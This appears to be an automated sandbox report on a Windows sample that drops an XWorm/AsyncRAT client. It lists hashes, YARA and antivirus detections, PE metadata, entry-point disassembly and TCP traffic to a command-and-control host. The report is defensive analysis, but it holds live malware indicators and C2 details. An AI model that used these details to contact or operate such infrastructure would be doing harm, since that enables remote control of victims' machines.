                                                                                  SHA-256:B2E1C40CCD4F8527984BE100F9B3E4D361FFBFEDBB75D371B864564772ACD385
                                                                                  SHA-512:E68B867F0A3D76A970B4AB65FD632AE70F914B751767641FD06913C6780BC08294B92830B91C918A182592B1AA62ED3EEDE1419AD26785EC5D61C6C9AE95A615
                                                                                  Malicious:false
                                                                                  Preview:.n.W... .......@.........S5....}........................................................................................................................................................................................................... ...................................................................................................... ...................................................................................................................................................................................................................................................\.K.5....}!.....................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):215
                                                                                  Entropy (8bit):4.842714017180681
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:uncHUTIqUHek8KIfFhKP4SfHUyLGewqdeFIKLROtRslUERrUtAXtEGmNrOVgNnb:e28IqUHeksNhy5mOdeZlv2y9EGmNrDnb
                                                                                  MD5:679E182D5665B2C2C734273D313F4425
                                                                                  SHA1:A3EB802AD91F656E326B203D31DE512E9E457A1A
                                                                                  SHA-256:1F06BE15FFFA50F818A040059E2064E95BF526D0D5804FD8181B53B3FD6D8E85
                                                                                  SHA-512:B43F4E835B9CCA62C38F3413670A7F3A0C72CE381BD9E54C333A2FB21233C83CCE2E627A42A49197F5846FB8B6D03DF9A64696D6F5605E7F4057219BA5E4F738
                                                                                  Malicious:false
                                                                                  Preview:<SRPData version="1" sessionId="1"><Outcomes></Outcomes><Threshold launches="1" daysLaunched="1" dayOfLastLaunch="31" monthOfLastLaunch="5" yearOfLastLaunch="2025" userHasAccepted="false" timesPolled="0"/></SRPData>
                                                                                  Process:C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):215
                                                                                  Entropy (8bit):4.842714017180681
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:uncHUTIqUHek8KIfFhKP4SfHUyLGewqdeFIKLROtRslUERrUtAXtEGmNrOVgNnb:e28IqUHeksNhy5mOdeZlv2y9EGmNrDnb
                                                                                  MD5:679E182D5665B2C2C734273D313F4425
                                                                                  SHA1:A3EB802AD91F656E326B203D31DE512E9E457A1A
                                                                                  SHA-256:1F06BE15FFFA50F818A040059E2064E95BF526D0D5804FD8181B53B3FD6D8E85
                                                                                  SHA-512:B43F4E835B9CCA62C38F3413670A7F3A0C72CE381BD9E54C333A2FB21233C83CCE2E627A42A49197F5846FB8B6D03DF9A64696D6F5605E7F4057219BA5E4F738
                                                                                  Malicious:false
                                                                                  Preview:<SRPData version="1" sessionId="1"><Outcomes></Outcomes><Threshold launches="1" daysLaunched="1" dayOfLastLaunch="31" monthOfLastLaunch="5" yearOfLastLaunch="2025" userHasAccepted="false" timesPolled="0"/></SRPData>
                                                                                  Process:C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe
                                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                                  Category:dropped
                                                                                  Size (bytes):16384
                                                                                  Entropy (8bit):2.660667103151342
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:DJadNmQkr1eAFDfSDA3bTbfTHf59gFBNrUH6PpQhG0m4EbPVmVfPSYeZbmGPXSQu:VadNmQKqDA3bTr3aPUNhoOSFoi9S
                                                                                  MD5:94CC539278AF9FC9FF84CFDFD4381490
                                                                                  SHA1:9B0989C7599B55D2A5426ED465C4C8B717421A96
                                                                                  SHA-256:25F4209CEF69688925FB90383E5948D13DC8073EF0218D145A545E051D9E22C7
                                                                                  SHA-512:3CEA958A905B54B9EB6B29AF37F016069959AFD1F30A76C0852E38C10126FE6F09BDC48B143BF0C02A19CF4659C02A3F226D3B58582F9EEB8E40A7C5BAD15DCD
                                                                                  Malicious:false
                                                                                  Preview:regf........b.Q.7.................. .... ......y.b.3.d.8.b.b.w.e.\.S.e.t.t.i.n.g.s.\.s.e.t.t.i.n.g.s...d.a.t...y..j.....J.....y..j.....J.........z..j.....J.....rmtm./..k................................................................................................................................................................................................................................................................................................................................................L|q........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe
                                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                                  Category:dropped
                                                                                  Size (bytes):12288
                                                                                  Entropy (8bit):3.371886878163016
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:YJa5NmQkr1eAFDfSDA3bTbfTHf59gFBNrUH6PpQhG0m4EbPVmVfPSYeZbmGPXSQu:8a5NmQKqDA3bTr3aPUNhoOSFoi9S
                                                                                  MD5:2EFE324263D285C88F251E12BB29F2A6
                                                                                  SHA1:B76D52A381A0D06F530BECB06089C6C33D7B6D45
                                                                                  SHA-256:6AC1849AFE093F595818DCF6A64ECADADE271E44252337D361F5728A6A37253D
                                                                                  SHA-512:25E8DF3AD80DA9CA94FF0BB636ABF98743953FF62F3BF9B2E7A70965AC393DAE2C9BEB022D2F6F3056133A249FF8C29F7579CA0A615D8290368A7E804F5A8378
                                                                                  Malicious:false
                                                                                  Preview:regf........b.Q.7.................. .... ......y.b.3.d.8.b.b.w.e.\.S.e.t.t.i.n.g.s.\.s.e.t.t.i.n.g.s...d.a.t...y..j.....J.....y..j.....J.........z..j.....J.....rmtm./..k................................................................................................................................................................................................................................................................................................................................................L|qHvLE............. ......_...'.w....._...... ..hbin................b.Q.7..........nk,.T...7..................................x...............................Test....p...sk..h...h.......t.......H...X.............4.........?.......................?....................... ... ...............YQ..fr]%dc;.............nk ...I.k...................................h...............................Configuration...p...sk..x...x.......t.......H...X.............4.........?.......................
                                                                                  Process:C:\Users\user\Desktop\test2.exe.bin.exe
                                                                                  File Type:Audio file with ID3 version 2.4.0, contains: MPEG ADTS, layer III, v1, 320 kbps, 48 kHz, JntStereo
                                                                                  Category:dropped
                                                                                  Size (bytes):81707
                                                                                  Entropy (8bit):4.126349148377333
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:/60rlQ+cKFV0G90CSSQ9sPw0JUn3Ju4iLXGIbtqy8BjT2UqwEvNf1vCvhYmTUFQ0:/7JQtKJQYwYUnZu4iLW+EjNgZCim5YdF
                                                                                  MD5:79953F860B5BEC1F7ED6AC173203BA28
                                                                                  SHA1:236BF7949BD8345BEF52C95E0298DF1A9AA5BCDE
                                                                                  SHA-256:318D3882B99BF80B35ADA45E27D79593468DB6563A1DEB4935B768620AF35D50
                                                                                  SHA-512:B1B2330FE0CA271489CD1367F95ACF129BEF13801BBB9A0A421916BF5B67017FD03F06C4C8B7EC0F3E3D94CD7D9912048DC2FD2C578E67D791888DC598D8FCB1
                                                                                  Malicious:false
                                                                                  Preview:ID3......aTPE1.......Gaming Sound FX.TIT2.......Bruh - Sound Effect (HD).TSSE.......Lavf60.3.100..............d.....i....... .......... ..4....LAME3.100UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUULAME3.100UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
                                                                                  Process:C:\Users\user\AppData\Local\Temp\XClient.exe
                                                                                  File Type:Generic INItialization configuration [WIN]
                                                                                  Category:dropped
                                                                                  Size (bytes):66
                                                                                  Entropy (8bit):3.9225895736416696
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:rRSF0KKM2XNsr42VjF0KKM2XX:EFmM2ur5FmM2n
                                                                                  MD5:3E8317227986355E07042038E6B37B00
                                                                                  SHA1:8260AE251A3C632F28B61AFDE65251934A6654BA
                                                                                  SHA-256:89B70297198948DAA067605A1520B670439385CEBB1176127FE55AE731B1E6DD
                                                                                  SHA-512:EC274C42553B7C29ED6AA814BC4A06B7EDA747D45AB283460AE9C3E839AE2C56DCF0CDBB936A46B58C510A240CA0171F941ABFBC3D59743880DDC28C9E7CD5E9
                                                                                  Malicious:false
                                                                                  Preview:....### Groove Music ###..[WIN]r[WIN]....### Groove Music ###..r
                                                                                  Process:C:\Users\user\Desktop\test2.exe.bin.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):66560
                                                                                  Entropy (8bit):6.059738091369709
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:Av0IoKmrPN5OoUFexjB2AbCJ4BPF+buERznntO9UAWX:Q0LKmrPV26E4BPF+buy7tO9UD
                                                                                  MD5:4D152B9AAAEC95BD696369CE3793BBF5
                                                                                  SHA1:63FA940184616380E268E4C377528826256823B8
                                                                                  SHA-256:672777833A6661125CDD6586664AAA62E31FC362B777E178FA45A285B989CD56
                                                                                  SHA-512:8F9F6D151896E2912CAB915034DC4EDF633006109DA2C5070A4A12DF1C0E2406594927048A0DF05CB73AC34263DC96C53B4266185D0551ADCD33959967716719
                                                                                  Malicious:true
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\XClient.exe, Author: Joe Security
                                                                                  • Rule: rat_win_xworm_v3, Description: Finds XWorm (version XClient, v3) samples based on characteristic strings, Source: C:\Users\user\AppData\Local\Temp\XClient.exe, Author: Sekoia.io
                                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\XClient.exe, Author: ditekSHen
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 92%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g................................. ... ....@.. .......................`............@.....................................W.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......x[..L.......&.....................................................(....*.r...p*. S...*..(....*.r!..p*. .(8.*.s.........s.........s.........s.........*.rA..p*. ~{..*.ra..p*. .i.*.r...p*. =...*.r...p*. Q..*.r...p*. E/..*..((...*.r...p*.r...p*. |A..*"(....+.*&(....&+.*.+5sF... .... .'..oG...(,...~....-.(D...(6...~....oH...&.-.*.rw..p*. u..*.r...p*. ....*.r...p*. .T..*.r...p*. "Y..*.r...p*. ....*..............j..................sI..............*"(F...+.*:.t....(A...+.*
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Users\user\AppData\Local\Temp\XClient.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 66560
Entropy (8bit): 6.059738091369709
Encrypted: false
SSDEEP: 1536:Av0IoKmrPN5OoUFexjB2AbCJ4BPF+buERznntO9UAWX:Q0LKmrPV26E4BPF+buy7tO9UD
MD5: 4D152B9AAAEC95BD696369CE3793BBF5
SHA1: 63FA940184616380E268E4C377528826256823B8
SHA-256: 672777833A6661125CDD6586664AAA62E31FC362B777E178FA45A285B989CD56
SHA-512: 8F9F6D151896E2912CAB915034DC4EDF633006109DA2C5070A4A12DF1C0E2406594927048A0DF05CB73AC34263DC96C53B4266185D0551ADCD33959967716719
Malicious: true
Yara Hits:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\test, Author: Joe Security
• Rule: rat_win_xworm_v3, Description: Finds XWorm (version XClient, v3) samples based on characteristic strings, Source: C:\Users\user\AppData\Local\Temp\test, Author: Sekoia.io
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\test, Author: ditekSHen
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: ReversingLabs, Detection: 92%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g................................. ... ....@.. .......................`............@.....................................W.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......x[..L.......&.....................................................(....*.r...p*. S...*..(....*.r!..p*. .(8.*.s.........s.........s.........s.........*.rA..p*. ~{..*.ra..p*. .i.*.r...p*. =...*.r...p*. Q..*.r...p*. E/..*..((...*.r...p*.r...p*. |A..*"(....+.*&(....&+.*.+5sF... .... .'..oG...(,...~....-.(D...(6...~....oH...&.-.*.rw..p*. u..*.r...p*. ....*.r...p*. .T..*.r...p*. "Y..*.r...p*. ....*..............j..................sI..............*"(F...+.*:.t....(A...+.*

Process: C:\Windows\System32\svchost.exe
File Type: JSON data
Category: dropped
Size (bytes): 55
Entropy (8bit): 4.306461250274409
Encrypted: false
SSDEEP: 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5: DCA83F08D448911A14C22EBCACC5AD57
SHA1: 91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256: 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512: 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious: false
Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

File type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit): 7.1977303294380475
TrID:
• Win32 Executable (generic) a (10002005/4) 99.94%
• Win16/32 Executable Delphi generic (2074/23) 0.02%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• VXD Driver (31/22) 0.00%
File name: test2.exe.bin.exe
File size: 153'600 bytes
MD5: 2aa459d8249147d19837b06c8640a950
SHA1: 38d8e8405b5efa19120d93b67a95ca03d0da3696
SHA256: 1a6ad2dbd06aa2cd83a7275e492b9c98388243f1dd10e96394933251480acad5
SHA512: 4963332d4ce2c7041b8039f795ec58a629ebe4ce0cfd093c5f0803b1aa77e136fa72492a3a55d581715e36049c1b97bf8096f2b61b24e985f835685017093eb0
SSDEEP: 1536:ncIxGxxwe8BSlZ4bGqGZI/DSbhXPQMFkUFA/paJU39zYZQXcZMq3p3/f/JnDleqF:nRGjNbRZILcXTFFCUKNz2WMMORD/kG
TLSH: BBE3D9230A16AC62FEF3C6320C634636FDB1F6B2CA5589764947408E6DF8716E58CF19
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L............................L...............p....@..................................m.....................................
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x4014d1
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:
Time Stamp: 0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: a9c887a4f18a3fede2cc29ceea138ed3

Instruction (disassembly at entrypoint)
push ebp
mov ebp, esp
sub esp, 00000008h
nop
mov eax, 00000004h
push eax
mov eax, 00000000h
push eax
lea eax, dword ptr [ebp-04h]
push eax
call 00007F05A0B74F5Dh
add esp, 0Ch
mov eax, 004014AFh
push eax
call 00007F05A0B74F97h
mov eax, 00000001h
push eax
call 00007F05A0B74F94h
add esp, 04h
mov eax, 00030000h
push eax
mov eax, 00010000h
push eax
call 00007F05A0B74F88h
add esp, 08h
mov eax, dword ptr [00426574h]
mov ecx, dword ptr [00426578h]
mov edx, dword ptr [0042657Ch]
mov dword ptr [ebp-08h], eax
lea eax, dword ptr [ebp-04h]
push eax
mov eax, dword ptr [00427000h]
push eax
push edx
push ecx
mov eax, dword ptr [ebp-08h]
push eax
call 00007F05A0B74F62h
add esp, 14h
mov eax, dword ptr [00426574h]
mov ecx, dword ptr [00426578h]
mov edx, dword ptr [0042657Ch]
mov dword ptr [ebp-08h], eax
mov eax, dword ptr [edx]
push eax
mov eax, dword ptr [ecx]
push eax
mov eax, dword ptr [ebp-08h]
mov eax, dword ptr [eax]
push eax
call 00007F05A0B74D3Ch
add esp, 0Ch
push eax
call 00007F05A0B74F38h
add esp, 04h
leave
ret
push ebp
mov ebp, esp
sub esp, 00000004h
nop
mov eax, dword ptr [00426574h]
mov ecx, dword ptr [ebp+08h]
mov dword ptr [eax], ecx
mov eax, dword ptr [00000000h]

Data directories:
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x26500 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x28000 | 0x2f8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x26550 | 0x58 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections:
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x668 | 0x800 | c5de0bae10dd3692320ec100985aa899 | False | 0.40869140625 | data | 4.609985039863669 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x2000 | 0x24703 | 0x24800 | c44648cc56cdd1827b63d168e9363c50 | False | 0.550734428510274 | data | 7.191342161979317 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss | 0x27000 | 0x4 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x28000 | 0x2f8 | 0x400 | 1a81e557b8e13cf15d3843868cde2d0b | False | 0.353515625 | data | 4.275513236564972 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources:
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x28058 | 0x29f | XML 1.0 document, ASCII text | English | United States | 0.47093889716840537

Imports:
DLL | Import
msvcrt.dll | malloc, memset, strcmp, strcpy, getenv, sprintf, fopen, fwrite, fclose, __argc, __argv, _environ, _XcptFilter, __set_app_type, _controlfp, __getmainargs, exit
shell32.dll | ShellExecuteA
kernel32.dll | SetUnhandledExceptionFilter

Language of compilation system | Country where language is spoken | Map
English | United States | (map image not present in this extraction)

Suricata IDS alerts:
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-03-16T13:10:49.951717+0100 | 2853193 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.4 | 49773 | 193.161.193.99 | 41078 | TCP

TCP packets:
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 16, 2025 13:06:58.481085062 CET | 49710 | 443 | 192.168.2.4 | 92.123.20.9
Mar 16, 2025 13:06:58.481132030 CET | 443 | 49710 | 92.123.20.9 | 192.168.2.4
Mar 16, 2025 13:06:58.481199026 CET | 49710 | 443 | 192.168.2.4 | 92.123.20.9
Mar 16, 2025 13:06:58.506231070 CET | 49710 | 443 | 192.168.2.4 | 92.123.20.9
Mar 16, 2025 13:06:58.506258011 CET | 443 | 49710 | 92.123.20.9 | 192.168.2.4
Mar 16, 2025 13:06:58.913202047 CET | 49711 | 41078 | 192.168.2.4 | 193.161.193.99
Mar 16, 2025 13:06:58.917990923 CET | 41078 | 49711 | 193.161.193.99 | 192.168.2.4
Mar 16, 2025 13:06:58.918103933 CET | 49711 | 41078 | 192.168.2.4 | 193.161.193.99
Mar 16, 2025 13:06:59.171113968 CET | 443 | 49710 | 92.123.20.9 | 192.168.2.4
Mar 16, 2025 13:06:59.171192884 CET | 49710 | 443 | 192.168.2.4 | 92.123.20.9
Mar 16, 2025 13:06:59.250909090 CET | 49710 | 443 | 192.168.2.4 | 92.123.20.9
Mar 16, 2025 13:06:59.250935078 CET | 443 | 49710 | 92.123.20.9 | 192.168.2.4
Mar 16, 2025 13:06:59.251338005 CET | 443 | 49710 | 92.123.20.9 | 192.168.2.4
Mar 16, 2025 13:06:59.251400948 CET | 49710 | 443 | 192.168.2.4 | 92.123.20.9
Mar 16, 2025 13:06:59.254369974 CET | 49710 | 443 | 192.168.2.4 | 92.123.20.9
Mar 16, 2025 13:06:59.296334028 CET | 443 | 49710 | 92.123.20.9 | 192.168.2.4
Mar 16, 2025 13:06:59.448939085 CET | 443 | 49710 | 92.123.20.9 | 192.168.2.4
Mar 16, 2025 13:06:59.448966026 CET | 443 | 49710 | 92.123.20.9 | 192.168.2.4
Mar 16, 2025 13:06:59.449018955 CET | 49710 | 443 | 192.168.2.4 | 92.123.20.9
Mar 16, 2025 13:06:59.449059963 CET | 443 | 49710 | 92.123.20.9 | 192.168.2.4
Mar 16, 2025 13:06:59.449079037 CET | 49710 | 443 | 192.168.2.4 | 92.123.20.9
Mar 16, 2025 13:06:59.449146986 CET | 49710 | 443 | 192.168.2.4 | 92.123.20.9
Mar 16, 2025 13:06:59.449373960 CET | 443 | 49710 | 92.123.20.9 | 192.168.2.4
Mar 16, 2025 13:06:59.449425936 CET | 49710 | 443 | 192.168.2.4 | 92.123.20.9
Mar 16, 2025 13:06:59.449438095 CET | 443 | 49710 | 92.123.20.9 | 192.168.2.4
Mar 16, 2025 13:06:59.449480057 CET | 49710 | 443 | 192.168.2.4 | 92.123.20.9
Mar 16, 2025 13:06:59.451983929 CET | 49710 | 443 | 192.168.2.4 | 92.123.20.9
Mar 16, 2025 13:06:59.452003002 CET | 443 | 49710 | 92.123.20.9 | 192.168.2.4
Mar 16, 2025 13:07:00.575731993 CET | 41078 | 49711 | 193.161.193.99 | 192.168.2.4
Mar 16, 2025 13:07:00.575846910 CET | 49711 | 41078 | 192.168.2.4 | 193.161.193.99
Mar 16, 2025 13:07:00.877520084 CET | 49711 | 41078 | 192.168.2.4 | 193.161.193.99
Mar 16, 2025 13:07:00.882988930 CET | 41078 | 49711 | 193.161.193.99 | 192.168.2.4
Mar 16, 2025 13:07:01.018765926 CET | 49714 | 41078 | 192.168.2.4 | 193.161.193.99
Mar 16, 2025 13:07:01.024961948 CET | 41078 | 49714 | 193.161.193.99 | 192.168.2.4
Mar 16, 2025 13:07:01.025053978 CET | 49714 | 41078 | 192.168.2.4 | 193.161.193.99
Mar 16, 2025 13:07:01.304323912 CET | 49714 | 41078 | 192.168.2.4 | 193.161.193.99
Mar 16, 2025 13:07:01.309083939 CET | 41078 | 49714 | 193.161.193.99 | 192.168.2.4
Mar 16, 2025 13:07:02.684691906 CET | 41078 | 49714 | 193.161.193.99 | 192.168.2.4
Mar 16, 2025 13:07:02.691138029 CET | 49714 | 41078 | 192.168.2.4 | 193.161.193.99
Mar 16, 2025 13:07:05.905127048 CET | 49714 | 41078 | 192.168.2.4 | 193.161.193.99
Mar 16, 2025 13:07:05.907808065 CET | 49717 | 41078 | 192.168.2.4 | 193.161.193.99
Mar 16, 2025 13:07:05.909827948 CET | 41078 | 49714 | 193.161.193.99 | 192.168.2.4
Mar 16, 2025 13:07:05.912553072 CET | 41078 | 49717 | 193.161.193.99 | 192.168.2.4
Mar 16, 2025 13:07:05.932934999 CET | 49717 | 41078 | 192.168.2.4 | 193.161.193.99
Mar 16, 2025 13:07:06.148951054 CET | 49717 | 41078 | 192.168.2.4 | 193.161.193.99
Mar 16, 2025 13:07:06.154184103 CET | 41078 | 49717 | 193.161.193.99 | 192.168.2.4
Mar 16, 2025 13:07:07.571748972 CET | 41078 | 49717 | 193.161.193.99 | 192.168.2.4
